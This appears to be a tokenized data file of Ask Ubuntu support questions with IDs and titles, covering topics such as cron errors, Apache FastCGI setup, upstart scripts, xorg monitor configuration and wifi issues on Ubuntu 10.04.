3094	overriding a executable to add a default flag	here 's my boggle . i use gmplayer to play all my videos . 99.9 % of the time everything works fine but in that 1-in-1000 case , a video might be corrupted . gmplayer plays the video but it cries like an angry , hungry baby , popping up windows left , right and centre . in really bad videos this actually slows down the whole system as it spawns hundreds of error windows ( compiz applies effects , etc ) . it also steals focus and occasionally cancels christmas . in the command-line mplayer these messages are just throw out to the command line . using mplayer-proper might be an option if i ca n't use gmplayer but it 's not quite as good for my needs . i have found a workaround . if you add -msglevel all=0 to the gmplayer call , errors are suppressed . useless from a debug perspective but i 'm not attempting to debug videos here , just watch them . what i want to do is `` alias '' or `` proxy '' the gmplayer command so when you run gmplayer from the command line or by association , it actually runs gmplayer -msglevel all=0 . i gather that just adding a bash alias wo n't work for associated ( as in double clicking on a video in gnome ) plays . what are my options for hard-proxying the command . this only needs to work for one user but i 'm open to system-wide changes too .
3105	how can i read skype 's menus on a dark theme ?	if you use skype with the default 10.04 theme you ca n't read any menu because the font and background colours are too similar .
3108	monochrome pidgin tray icons	can anyone point me towards monochrome pidgin tray icons , and tell me how to install them ? ( i know i should be using the messaging menu indicator applet or whatever it 's called , but at the moment i prefer not to , and use the standard pidgin tray applet )
3109	network manager or wicd ?	a couple of years ago when i first began using ubuntu i had issues with network manager and so i switched to wicd which works perfectly . ( i forget the exact issues , but wicd solved the problems ) i am about to do a fresh install and curious as to whether i should continue with wicd ? or is network manager up to the job now ? thanks . addendum i ask because a friend recently switched his laptop over to ubuntu and had wireless troubles until switching over to wicd . my situation is with a desktop using wireless .
3113	mediawiki export in openoffice.org 3	i 've just recently found an article that describes some default functionality in openoffice.org 3 that is n't present in my install on 10.04 - this entry details that the export functionality post 2.4 should have mediawiki listed - but i only see xml , html , and pdf in the export options . was this removed by the maintainers of this package in ubuntu - or is there a package i have n't downloaded . how do i restore this functionality ?
3115	what 's wrong with my cron.hourly configuration ?	every hour i get an email with error like this , subject : cron < root @ supa > root cd / & & run-parts -- report /etc/cron.hourly /bin/sh : root : not found contents of /etc/crontab is as follows , either i remove user `` root '' or not ( 6th column ) , i get the same error . shell=/bin/sh path=/usr/local/sbin : /usr/local/bin : /sbin : /bin : /usr/sbin : /usr/bin # m h dom mon dow user command 11 * * * * root cd / & & run-parts -- report /etc/cron.hourly 25 6 * * * test -x /usr/sbin/anacron || ( cd / & & run-parts -- report /etc/cron.daily ) 47 6 * * 7 test -x /usr/sbin/anacron || ( cd / & & run-parts -- report /etc/cron.weekly ) 52 6 1 * * test -x /usr/sbin/anacron || ( cd / & & run-parts -- report /etc/cron.monthly ) # there are two files in my cron.hourly directory , $ ll /etc/cron.hourly/ total 0 lrwxrwxrwx 1 root root 25 2009-10-29 09:24 ntpsync - > /home/ < user > /bin/ntpsync lrwxrwxrwx 1 root root 28 2009-10-23 10:33 foo - > /home/ < user > /bin/foo first script reads as follows , $ cat ~/bin/ntpsync # ! /usr/bin/env bash echo `` user : $ user '' if [ [ `` $ user '' == `` root '' ] ] ; then ntpdate ntp.ubuntu.com else sudo ntpdate ntp.ubuntu.com fi even i remove both scripts in my /etc/cron.hourly/ directory , i still get the same error email every hour . i tried to restart cron and i still get the same error email . the next idea i have is to reboot but i 'd avoid that . $ sudo /etc/init.d/cron restart my ubuntu version is as follows , $ cat /etc/lsb-release distrib_id=ubuntu distrib_release=8.04 distrib_codename=hardy distrib_description= '' ubuntu 8.04.1 '' update : i removed the 6th columns `` root '' from my /etc/crontab file earlier because when i searched online someone mentioned that could fix the problem . now i think the problem was that i was messing around with the system crontab config instead of that of the root 's . $ sudo crontab -l # m h dom mon dow command 17 * * * * root cd / & & run-parts -- report /etc/cron.hourly 25 6 * * * root test -x /usr/sbin/anacron || ( cd / & & run-parts -- report /etc/cron.daily ) 47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / & & run-parts -- report /etc/cron.weekly ) 52 6 1 * * root test -x /usr/sbin/anacron || ( cd / & & run-parts -- report /etc/cron.monthly )
3116	ubuntuone contact synching for thunderbird ?	is it possible to sync ubuntuone contacts with thunderbird 's address book ?
3126	upstart-supervised init script for apache ?	i want to run apache on ubuntu 10.04 , and use the nice supervision stuff in upstart ( i 'm not just talking about the apache init script , but proper service supervision a la daemontools - which is to say , restarting apache when it dies , things like that ) . does anyone have a running upstart config for supervising apache on ubuntu 10.04 ? the googles have been no help to me , but it could be that my google-fu is weak .
3127	how to write a shell script to move files from ftp server to network share drive	i have customers who upload large amounts of data to my ftp server ( an ubuntu 9.10 machine ) . once the files are uploaded , i am faced with transferring them to a local droboshare network drive so our technical support staff can retrieve them and analyze the issue . after i mount the network share at /media/ < sharename > i run this command manually to get these files : sudo mv /home/ftp/ < data_dir > / < file_name > /media/ < network_share > / < ftp_user_data > but this takes forever and if there are tens or hundreds of files , i ca n't realistically do this over and over again . i thought it would be nice to have a script that i could run periodaclly to transfer a group of these files to the network share . i can sort them as the technical support staff uses them . i am still new to linux and writing shell scripts . anyway to do this easily ? just to add to the description here , the files could be zip files , fasta files , tar.gz files , and/or txt files . also , if the zip files are large , certain zipping programs convert these to zip.001 , zip.002 , zip.003 , etc ... so the file type in this ftp directory could be quite varied . i was thinking the way i can identify these files is by simply transferring all files in the directory ( although this may take a while ) or to somewhat designate a subset of these , according to time completed or something like this . i 'm open to ideas . thanks in advance .
3130	is git-svn in the 10.04 repos broken ?	has anyone seen problems with git-svn not installing properly from synaptic in 10.04 ? anyone know how to fix this ?
3132	how do i set up an hp remote control ?	i have an old receiver ( usb ) and remove control that i am trying to get working on ubuntu with boxee . any suggestions for setting this up ? software i need .
3135	most elegant way to check if a process is running , and start if not ?	i 've been messing around with various ways to do this in bash , and i 've found pgrep program > /dev/null || program to be the shortest/most elegant way of doing this . is there a better method than this ?
3136	extracting meta data from raw images ( dslr camera )	i am searching for a tool , that extracts meta data out of raw images produced by a digital slr ( in my case canon eos 550d ) . the photos can be converted by a recent version of ufraw ( here is the ppa for that ) . with my compact camera i simply use exif , which only works on jpg and does not work with raw images . any hints ?
3137	user account messed up . how to restore functionality ?	complete story : when i installed simon tatham 's portable puzzle collection via ubuntu software center , i noticed some of the newest puzzles were missing . so i decided to get the source files and compile them myself . i uninstalled the collection and downloaded the appropriate tar.gz file from the creator 's website . when i tried make , i got many error messages and i found out i was missing some libraries . i went on installing lib-gtk-2.0 ( i think ) and my first compilation ever on linux was a success . i did n't have any decent shortcuts on the appropriate subfolder on the gnome menu ( i 'm using une ) , so i used alacarte to attach the correct images to the shortcuts . the first thing i noticed was that the other user accounts did n't have the shortcuts as well . also , all games suffered from the same problem . whenever the user opened the system menu in any game , that menu remained drawn forever on the window . i did n't like that at all , so i decided to only keep the puzzles that were missing form the original collection and reinstall the rest from ubuntu software center . i though i would at least have most of the games behaving correctly . therefore , i used alacarte again to delete the `` common '' shortcuts . after the installation though , i was n't getting any of the shortcuts on the gnome menu ( other user accounts had them correctly ) , so i decided to delete alacarte 's configuration files found inside ~/.config/ ? ( i 'm not in front of an ubuntu-running computer at the moment , so i ca n't tell for sure ) . now my user account profile is broken . when i log on , the top ( and only ) bar is not loading at all . i do n't want to mess up the profile further so i decided to stop here and ask for help . how to restore the top gnome bar missing and have my shortcuts working correctly from now on ? deleting and recreating the user account is not an option . sorry for the long story ( i believe it was necessary to explain the steps i took in order to help others help me ) . kudos to the guy who can also tell me why the system menus did n't work correctly when i compiled the games myself . update : i 'm also missing the windows title bars and borders around . also the z-order of the windows can not be changed ( gnome is not bringing the active window in front ) . finally , under `` files & folders '' no shortcuts are not working ( i 'm getting the message `` no application is registered as handling this file '' ) .
3146	touchpad mouse stopped working after partition changes	because my ubuntu partion was to small , i have enlarged it with the ubuntu livecd + gparted . all went fairly well ( it said there were 2 warnings , but nothing severly ) , but afterwards , after i have logged in , the touchpad stops working . strange thing is , in the login screen , it still works perfectly , and an external usb mouse also works . i have a hp dv6 2030sd laptop with ubuntu 10.04 installed . does anyone know what steps i can take to solve this problem ?
3155	upstart , exec and stderr	i am using syslog-ng on a ubuntu lucid machine with the following upstart script : # syslog-ng - system logging daemon # description `` syslog-ng daemon '' start on ( local-filesystems and net-device-up iface ! =lo ) stop on runlevel [ ! 2345 ] expect fork respawn pre-start script test -x /usr/sbin/syslog-ng || { stop ; exit 0 ; } mkdir -p -m0755 /var/run/syslog-ng end script exec /usr/sbin/syslog-ng -p /var/run/syslog-ng/syslog-ng.pid when the syslog-ng configuration file is wrong , syslog-ng outputs an error message on stderr . unfortunately , this error is caught by upstart and does n't get to the console when starting the service , so there is no way to know why the service start failed . is it normal that upstart would catch stderr ? can it be set ?
3159	delete eth0 avahi from the ifconfig list	hello this is the response i get from ifconfig . now i have two eth0 things being showed up . i need to delete the second one which says eth0 : avahi . i posted my ifconfig 's response on a site as i has problem using wired internet , and they suggested to remove the eth0 avahi , to get internet . but i am a newbie to linux networking and have no idea how to delete this . response for ifconfig eth0 link encap : ethernet hwaddr 18 : a9:05:22 : cd : f9 up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) interrupt:28 base address:0x4000 eth0 : avahi link encap : ethernet hwaddr 18 : a9:05:22 : cd : f9 inet addr:169.254.10.43 bcast:169.254.255.255 mask:255.255.0.0 up broadcast multicast mtu:1500 metric:1 interrupt:28 base address:0x4000 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:796 errors:0 dropped:0 overruns:0 frame:0 tx packets:796 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:64016 ( 64.0 kb ) tx bytes:64016 ( 64.0 kb ) wlan0 link encap : ethernet hwaddr 00:26:82:3c : ac:27 inet6 addr : fe80 : :226:82ff : fe3c : ac27/64 scope : link up broadcast multicast mtu:1500 metric:1 rx packets:52142 errors:0 dropped:0 overruns:0 frame:0 tx packets:30404 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:60816983 ( 60.8 mb ) tx bytes:4160159 ( 4.1 mb )
3165	how do i play a midi from the command line in ubuntu ?	i 'd like to do something like $ play filename.mid and hear the midi file played without opening up a graphical program . is there a package for ubuntu that can do this ?
3167	what is difference between the options `` autoclean '' , `` autoremove '' and `` clean '' ?	apt-get has a few options which looks the same to me : autoclean , autoremove and clean . what do each of them do ?
3170	how to fix ssl error from python apps ( urllib ) when behind https proxy ?	example of a failure : ***** processing account gmail copying folder structure from gmail to mappedimap establishing connection to imap.gmail.com:993 . warning : error occured attempting to sync account gmail : [ errno 8 ] _ssl.c:490 : e of occurred in violation of protocol
3176	how can i install a gnome applet without privileges	i would like to install stackapplet , but i do n't have superuser privileges to install the deb file and the admins will not install it for me . i 'm confident that i must be able to install this applet without privileges , but i ca n't seem to find a really good guide . what are the steps i need to take to install this applet ?
3178	how do i make gnome ( and gnome applications ) automatically detect a wvdial connection ?	i use wvdial in order to connect to the internet using a cdma usb modem that is n't detected by the nm-applet . however , once i 've connected , gnome and other gnome applications do n't seem able to determine that i am connected to the internet . ( e.g . empathy , ubuntu one remain offline , firefox `` work offline '' has to be disabled manually ) the desired effect is : i connect via wvdial and gnome detects this and enables everything appropriately .
3179	closing lid freezes laptop	closing the lid on my dell studio 15 which is running ubuntu 10.04 freezes the screen . this is a new problem in ubuntu 10.04 which did not exist in 9.10 i have tried playing with all the settings in system- > preferences- > screensaver but nothing seems to make any difference . ( please note the power management settings are accessible from here so i have tried those too . ) i do n't need hibernate or suspend . i just want to be able to close the lid , and then open it and still have a working laptop . is their a settings somewhere that will make ubuntu ignore the lid closing ?
3180	text editor capable of running complex regular expressions ?	i want to find a text editor capable of running and mainly storing regular expressions for later re-use . it should also be able to run them across multiple files . i know i can get all that with grep , but there is not much for re-use on it . i was able to get some regular expression functionality on gedit with plugins , but not nearly close to my needs . there is editpad pro for windows ( runs on wine ) but native is always better : )
3182	alt+printscreen stopped working , how to find processes listening to events	very odd issue today . i was going to post a thread about another issue and wanted to take a screenshot of a terminal window . i got it all prepped , hit alt+printscreen and nothing happened . i went into keyboard shortcuts to see if redefining the shortcut worked . it did . i tried to set it back to alt+printscreen but the window just sat there listening for a keypress . it 's as if i never pushed a key . both the alt and printscreen keys work independently just fine ... i 've also tried looking at the output of xev as i press the keys . it hears the alt press but does n't hear the printscreen afterwards . i 've tried this from both within compiz and plain metacity . i also have a spare keyboard and that shows identical behaviour ( one keyboard is ps/2 , the spare is usb - so not a port issue ) . it 's like there 's something sitting in the event chain spitting on the event so that nothing else can hear it . my question is basically : how can you find the processes responding to certain events ? as requested : oli @ bert : ~ $ xmodmap -pke | grep -i mode keycode 82 = kp_subtract xf86_prev_vmode kp_subtract xf86_prev_vmode keycode 86 = kp_add xf86_next_vmode kp_add xf86_next_vmode keycode 100 = henkan_mode nosymbol henkan_mode keycode 203 = mode_switch nosymbol mode_switch and oli @ bert : ~ $ xmodmap -pke | grep -i print keycode 107 = print sys_req print sys_req keycode 218 = print nosymbol print edit : when i posted this i was on lucid with a home-built 2.6.35 kernel . it turns out my issue is related to the kernel and not x . somebody somewhere has decided that alt-printscreen should render a sysrq event . technically speaking , perhaps it should but this breaks what-must-be over a decade of linux and windows `` known behaviour '' .
3189	is there any way to turn my laptop into a wireless access point for other devices ?	is there an easy , simple way to setup a wireless network so my laptop ( which is connected by a wired connection ) can share that connection with my mobile phone and other devices ? thank you for any answers in advance !
3197	do appindicators work on xubuntu ?	i do n't have access to an xubuntu install right now so i thought i 'd just ask this here . does xubuntu ( or more specifically , the xfce panel ) support appindicators ? i 'm porting an application to use them and i am curious to know if my app will work there .
3201	ubuntu server on 5 year old pc	i was recently downloading ubuntu server to put on an old machine to serve media around my house . i was wondering why they recommend the 64-bit version of there server ? does this affect anything if i am putting it on a 5 year old computer ? what about 32 bit ? also if you could recommend some best practices for a home server . i would like to share files stream . also host some webpages as well as use it as my git repository . a tutorial links would be appreciated or very explicit advice : ) please and thank you .
3203	how to set up apache with fastcgi and a simple test script ?	it 's been a few days that i 'm trying to set up fastcgi with apache on a kubuntu server . despite searching everywhere , i can not make it to work . if i try to run the site with the cgi application , apache hangs and after the timeout returns a 500 error . here is what i did : i made sure that mod_fastcgi is installed and enabled : # pwd /etc/apache2/mods-enabled # ls -l f* lrwxrwxrwx 1 root root 30 2010-07-22 10:01 fastcgi.conf - > ../mods-available/fastcgi.conf lrwxrwxrwx 1 root root 30 2010-07-22 10:01 fastcgi.load - > ../mods-available/fastcgi.load as far as i am aware , fastcgi.conf is properly configured : < ifmodule mod_fastcgi.c > addhandler fastcgi-script .fcgi # fastcgiwrapper /usr/lib/apache2/suexec fastcgiipcdir /var/lib/apache2/fastcgi < /ifmodule > i am using this very simple sample script to test the set up : # include < iostream > using namespace std ; int main ( ) { cout < < `` content-type : text/plain '' < < endl < < endl ; cout < < `` hello world ! `` < < endl ; return 0 ; } i compiled it . it works fine from the command line . i placed it within a folder visible from the web server : http : //127.0.0.1/fcgitest/run.fcgi at first i get : `` forbidden . you do n't have permission to access /fcgitest/run.fcgi on this server. '' . i add a .htaccess file in the folder : options +execcgi -indexes and now , when i try to access the script address from my web browser , i get the symptom i described at the beggining : the browser first hangs , and after the timeout , i get a 500 internal server error . the apache error.log say : content-type : text/plain hello world ! [ sat aug 28 09:08:23 2010 ] [ warn ] fastcgi : ( dynamic ) server '' /var/www/fcgitest/run.fcgi '' ( pid 27758 ) terminated by calling exit with status '0' it seems the output is written to the error logs ! ! is there a missing socket configuration , somewhere ? ?
3204	setting http proxy in awesome wm	i have installed awesome on top of ubuntu 10.04 and switch between gnome and awesome sessions ( partly because i am still learning awesome and partly because i use a few apps that require gnome desktop ) . further i need to use a proxy server @ work whereas @ home i have a direct connection . under gnome , i have defined 2 locations with gnome-network-properties ( hereafter , g-n-p ) and switch between these as needed . however , when i login to awesome , i am left with the settings as set in my last gnome session . i ca n't invoke g-n-p because it needs gnome-settings-daemon to be running which is of course not the case . if i need to change i need to logout and in twice ( once into gnome to switch location and then back into awesome ) . since i use many apps within awesome that use system proxy settings ( synaptic , firefox ) i 'd like to be able to centrally switch the proxy configuration without leaving the awesome desktop . i understand running gnome-network-properties sets some gconf-editor keys and also updates *_proxy environment vars in /etc/environment ( and probably elsewhere also ) . is there a way to achieve the same effect via a script or some replacement tool for g-n-p that does n't use gnome-settings-daemon ?
3205	higher screen resolution in virtualbox ?	i 've just installed ubuntu 10.04 into virtualbox on windows 7 . unfortunately the only options showing for screen resolution are 640x480 and 800x600 and the monitor is showing as 'unknown ' . how would i go about upping the resolution to 1280x1024 ( i 'm on a 1600x1200 monitor ) ? update i tried mounting the virtualbox 'guest additions ' iso ( from the vbox 'devices ' menu ) and doing sudo sh ./vboxlinuxadditions-x86.run from the mounted drive , which gave 2 new listed resolutions after a reboot ( 1024x768 and the 16:9 version of that resolution ) . these worked when i selected them but disappeared when i switched back to another resolution . i tried rebooting and running vboxlinuxadditions-x86.run again but onlu the 2 low res options listed this time . i think i 'm going to reinstall ... seems to be a vbox problem rather than an ubuntu problem as after reinstalling 10.4 overwriting the original virtual partition , sudo sh ./vboxlinuxadditions-x86.run now has no affect at all .
3209	what spreadsheet programs are available ?	just i want to know if there are any other spreadsheet programs instead of openoffice.org calc ... .
3216	how do i put ubuntu on a non-flash external usb hard-drive ?	amazingly enough , circumstances have left me without a single usb flash drive , or a working cd-r drive . also , because i moved about six months ago , i got rid of all my extra ubuntu cds that i used to get by mail . ( cleanup win , hindsight fail ) and yet , i need to get a live ubuntu going to boot up a wonky desktop computer . i tried using unetbootin to put a live cd install onto a portable usb hard-drive , but it wo n't boot from it ( ntldr missing error ) . is this because the disk is ntfs ( which it is ) ? or for some other reason ? is there a difference between booting from a portable usb thumbdrive and a portable usb hard drive , other than potential performance ?
3227	how do i changed the language used by the gnome spell checker ?	i 'm a canadian , but often get american spelling suggestions from the spell checker in ubuntu . how do i switch to a canadian dictionary ?
3228	can you get a source rpm to build as a deb ?	the manufacturer of our printer ( canon ) does provide linux printer drivers for most its printers . however , they are all 32bit and only the newer printer drivers are available in both deb and rpm . the older are only provided as rpm files . i use 'alien ' to convert the rpm files to the deb format so i can install the drivers . however , lately it seemed canon has screwed the new drivers for the canon pixma ip3300 up a bit in the build process of the rpms . although all printer-specific rpm packages are available , the cnijfilter-common package , containing the vital cups filter , is distributed as a source rpm ( *.src.rpm ) . very useful to build your own drivers if you want to ( 'rpmbuild -- rebuild cnijfilter-common-2.70-2.src.rpm ' ) , but not so much when you run a debian-based operating system . my question is : is it easy to convert a source rpm to something you can easily build as a deb , or will i have to manually convert the source rpm to something usable ?
3237	why does my workspace intermittantly hold at partial dimness ?	the workspace between the top and bottom gnome panels occasionally dims about 25 % and holds there for an unpredictable period of time . sometimes it never recovers to full brightness . the cursor moves but buttons are non-responsive . most often this happens in firefox but is not restricted to this one program . the top and bottom gnome panels remain fully functional . the processor stays at an approximately steady 40 % `` user '' use . the memory hovers at about a 40 % mixture of `` user '' , `` buffers '' and `` cached '' use . network and disk activities flatline . sometimes the workspace un-dims itself and returns full control . when it does not the only things that work are pressing the automatically presented force quit button , typing `` xkill '' from a terminal or choosing to restart . usually the application that dimmed can be restarted without restarting the operating system . i 've experienced this in both karmic and lucid . what am i missing ?
3239	copying data from server to pc on the same network	i am recently setup a server to host my `` data '' movies and music and such . i was trying to copy the data back to my home computer using this command scp files/on/server user @ homecomputer : /home the response was unknown user @ computer , then i replaced with the ip address still same difference . how can i fix this ? please and thank you .
3241	top software to install on live usb drive , for windows recovery purposes	i installed the latest lubuntu image on a pen drive ( 2gb ) , using ubuntu 's startup disk creator . my goal for this pen drive is for maintenance of old windows xp machines . what software should i install for this ? whether it is already in the ubuntu repository or not . note : this is a community wiki page . i already know some of what to install and that that there are preconfigured distributions for this purpose . i just want a public list for reference ( in case i missed something ) . please mention one software per question posted , for better voting .
3248	what is the default character encoding ?	i do n't myself know how deep this question actually goes ( for example , for all i know there could be several , depending on my task ) . particularly , i am interested in what kinds of strings are used to name files and folders on the system . i am also interested in how strings are represented by default for a bash or python script .
3249	modifying /etc/hosts does not have an effect	i 'm attempting to block myself from time-wasting websites but changes i make to /etc/hosts . for example : 127.0.0.1 localhost 127.0.1.1 ross-laptop 127.0.0.1 bing.com # the following lines are desirable for ipv6 capable hosts : :1 localhost ip6-localhost ip6-loopback fe00 : :0 ip6-localnet ff00 : :0 ip6-mcastprefix ff02 : :1 ip6-allnodes ff02 : :2 ip6-allrouters ff02 : :3 ip6-allhosts i can access bing.com in a freshly opened chrome or firefox - why is this not working ?
3257	how do i remove the ubuntu boot option created by wubi ?	my friend installed ubuntu on a separate partition on a pc with windows 7 using wubi . but by mistake he reformatted the drive containing ubuntu . he is still getting ubuntu option in the boot menu . how can it be completely removed ?
3265	set boinc as a screensaver	i have a boinc manager installed contributing to world community grid . is there a way to set this to run as a screensaver visually in ubuntu ?
3270	is there an up-to-date vlc ppa for 10.04 ?	i 'm looking for updated vlc builds for lucid . i was using c-korn , but it 's gone .
3277	server converting files for iphone	i would like to convert videos i download to the iphone format on my server and be able to access and play them on my iphone . i looked into handbrake , but i was n't sure if it would work on the server . any suggestions you may have to set this up would be much appreciated . please and thank you .
3278	laptop fan not turning on when needed	it looks like my fan in my laptop is not turning on when appropriate . i already removed granola ( maybe it disables it far too long ? ) when i put the computer in sleep mode and resume it immediately turns on the fan ( the cpu was waaaaay overheated ) . so the question is : why does it not turn on when needed . there are multiple issues here : why , and how to diagnose this issue ? how can i control when the fan should turn on , how do i test that the code is turning on my fan , how do i turn on the fan manually through a command if all hell breaks lose ?
3284	sound in wine only partially working	i do n't use wine much , but saw this about running the bbc doctor who games omg ! ubuntu i only get sound for the first few seconds and then nothing . in the wine config it auto-selected alsa . the test sound button there makes a few odd noises and locks up that screen . any fixes for this ?
3287	how to convert mkv to dvd or avi	i have some mkv files , and while totem plays them perfectly , when i use devede to burn them to dvd it all gets messed up : the video is ok , but the audio is out of sync . i did see that devede does write my dixv avi files correctly to disk . so i am thinking what the best way could be to convert my mkv for playback on dvd ? i was thinking maybe converting them to avi first ? but i did not find a good way for that to happen . what do you suggest ?
3290	windows executables are started with archive manager	i have wine installed and several windows applications installed there run fine , if i start them using the right mouse menu `` open with wine program loader '' . but if i try starting an .exe file by just double clicking instead , the archive manager tries to open the executable . how do i fix that ? and something like a bonus question as a former windows user : can this be done easily for a single file i currently see in the file manager ( similar to the `` open with ... '' context menu in windows ) and for many file types together ( like in windows , using the menu `` folder settings '' in the explorer ) ?
3294	setup suspend-on-lid-close/fn+f4 outside of kde/gnome ?	on current ubuntu ( 10.04 ) suspend-on-lid/fn + f4 only works if some powermanagement-applet of kde/gnome is running . but what about suspend-to-lid if you are working on the console or using a non-bloated window-manager ? what is the current mechanism to configure suspend-on-lid system wide ? what of hald/udev/acpid/foo-kit/random-thing is the right place to hook this feature in ? what is the up-to-date command to suspend from the command line/script ? echo -n mem > /sys/power/state pm-suspend pmi or something else ? btw , if it matters , i want to configure it on some thinkpads .
3295	wi-fi only connects when router set to tkip , but wo n't use aes	for some reason , my computer ( running kubuntu netbook edition now , previously unr ) wo n't connect to my router when it 's set to aes+tkip . as soon as i switch the router to tkip only , the computer connects . should i be concerned about this ? does n't tkip bring me back down to the ultimately flawed wpa ? if so , is there a way to get [ k ] ubuntu to use aes ? edit : this is the 10.04 release version of kubuntu netbook hardware : asus eeepc 1000h ( wifi chipset : ralink rt2860 )
3299	how to run cron job when network is up ?	i have some anacron jobs which run daily . the scripts update local bzr and git repositories . naturally these scripts need working network connections . i 'm on a laptop and often wired and wireless internet do not come up fast enough . this causes my cron job to time out when pulling the repositories = ( so : how to make sure the internet is up before running specific cron jobs ? or how to fail a job if there is no network , such that it is retried by anacron later again ?
3306	which ide should i use for vala ?	i think the title explains it already ...
3315	what 's the bitwise tunnnlier equivalent for ubuntu ?	i used tunnlier in windows and it was perfect . after migrating to linux i , surprisingly , ca n't find anything that does the following : manage my ssh connections use terminal and sftp browser save my connections as profiles to load later i found putty and gstm , but they really do n't do what i mentioned above . what do you recommend ? moved here from superuser
3326	why are notifications so low ?	whenever notifications show up , they are much lower than i would expect . in most screenshots i see , they are directly under the top panel , but for me , there 's a large gap : is there any way to change the position ?
3327	can not get 'default ' apache virtualhost to work	i 've changed this from the original vhost but it should still work in my mind : listen 80 namevirtualhost *:80 < virtualhost *:80 > servername localhost serveradmin ross @ localhost documentroot /var/www < directory /var/www/ > options indexes followsymlinks multiviews allowoverride none order allow , deny allow from all < /directory > errorlog /var/log/apache2/error.log # possible values include : debug , info , notice , warn , error , crit , # alert , emerg . loglevel warn customlog /var/log/apache2/access.log combined < /virtualhost > the only difference between this and other working vhosts is that /var/www requires higher privileges to access it - i get a `` could not connect '' error which i assume is a 500 error ( chrome hides the status codes and i ca n't remember ) . what can i do to make this work ?
3335	why might i want to use a clipboard manager ?	i recently saw this poll asking for the `` best linux clipboard manager '' . what actually is a clipboard manager and in what situations would a clipboard manager be useful ? are there some differences in the default clipboard behaviour of ubuntu to other ( windows or mac ) systems ?
3340	make a usb port pretend to be a usb drive	i have a low-powered networked ubuntu pc next to my tv . i also have a humax pvr . the pvr has an option to record to a usb drive instead of its internal disk . i 'd like recording to be accessible on the network so i was wondering if it 's possible to get a usb male-to-male ( a-to-a ) lead , connect ubuntu to pvr and have ubuntu pretend to be a usb disk . i 've see this the other way around . the nokia n8** tablets were natively just seen as disks but with some hacking could be usb hosts . one side-note : i have other usb devices , plugged into the ubuntu machine , that need to to work as usual . edit : i 'm open to hardware solutions but i 'd rather not have to buy a nas that has usb and ethernet to sit in the middle . is a usb file transfer cable ( or similar ) an option ?
3341	is there any gui tool for upstart	is there currently any gui based application to show currently running services , with buttons to start and stop services ? it does n't necessarily need to be able to set boot up behaviour .
3348	how to get lilliput usb monitor working ?	okay , i just got a lilliput 7 '' usb monitor : unfortunately , i am having some trouble getting it to work in ubuntu . it is a displaylink device , so it should work in ubuntu . here is the output of lsusb : ... bus 002 device 007 : id 17e9:02a9 newnham research ... i modified my xorg.conf file to accommodate the device . # nvidia-settings : x configuration file generated by nvidia-settings # nvidia-settings : version 1.0 ( buildd @ yellow ) fri apr 9 11:51:21 utc 2010 # nvidia-xconfig : x configuration file generated by nvidia-xconfig # nvidia-xconfig : version 1.0 ( buildmeister @ builder58 ) fri mar 12 02:12:40 pst 2010 section `` serverlayout '' identifier `` layout0 '' screen 0 `` displaylinkscreen '' 0 0 screen 1 `` screen0 '' rightof `` displaylinkscreen '' inputdevice `` keyboard0 '' `` corekeyboard '' inputdevice `` mouse0 '' `` corepointer '' option `` xinerama '' `` 0 '' endsection section `` inputdevice '' # generated from default identifier `` mouse0 '' driver `` mouse '' option `` protocol '' `` auto '' option `` device '' `` /dev/psaux '' option `` emulate3buttons '' `` no '' option `` zaxismapping '' `` 4 5 '' endsection section `` inputdevice '' # generated from default identifier `` keyboard0 '' driver `` kbd '' endsection section `` monitor '' identifier `` monitor0 '' vendorname `` unknown '' modelname `` lpl '' horizsync 30.0 - 75.0 vertrefresh 60.0 option `` dpms '' endsection section `` monitor '' identifier `` monitor1 '' vendorname `` unknown '' modelname `` benq t705 '' horizsync 31.0 - 83.0 vertrefresh 56.0 - 76.0 endsection section `` device '' identifier `` device0 '' driver `` nvidia '' vendorname `` nvidia corporation '' boardname `` geforce 8400m gs '' endsection section `` device '' identifier `` device1 '' driver `` nvidia '' vendorname `` nvidia corporation '' boardname `` geforce 8400m gs '' busid `` pci:1:0:0 '' screen 1 endsection section `` screen '' identifier `` screen0 '' device `` device0 '' monitor `` monitor0 '' defaultdepth 24 option `` twinview '' `` 0 '' option `` metamodes '' `` dfp : nvidia-auto-select +0+0 '' subsection `` display '' depth 24 endsubsection endsection section `` screen '' identifier `` screen1 '' device `` device1 '' monitor `` monitor1 '' defaultdepth 24 option `` twinview '' `` 0 '' option `` metamodes '' `` crt : nvidia-auto-select +0+0 '' subsection `` display '' depth 24 endsubsection endsection # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # section `` files '' modulepath `` /usr/lib/xorg/modules '' modulepath `` /usr/local/lib/xorg/modules '' modulepath `` /usr/local/lib/xorg/modules/drivers '' endsection # # # # # # # # # # # # # # # displaylink stuff # # # # # # # # # # # # # # # section `` device '' identifier `` displaylinkdevice '' driver `` displaylink '' option `` fbdev '' `` /dev/fb1 '' endsection section `` monitor '' identifier `` displaylinkmonitor '' endsection section `` screen '' identifier `` displaylinkscreen '' device `` displaylinkdevice '' monitor `` displaylinkmonitor '' defaultdepth 16 subsection `` display '' depth 16 modes `` 800ă480 '' endsubsection endsection all i get is a green screen . any tips or advice would be appreciated ! update : i discovered that x11 was having trouble finding the displaylink_drv.so module , so i fixed that . then my xserver completely crashed . ( segmentation fault , i believe . ) now i 'm really confused .
3353	how to change icons in the side pane of the nautilus file browser ?	right-click in the main panel allows to change icons associated to files of directories , and this is cool for content organization and so on . unfortunately , right click on small directories on the side pane does not allow to change its properties ( such as icon ) . i try to change the original directory icon , expecting that its side pane version would change accordingly , but surprisingly , nothing appends ... any idea ?
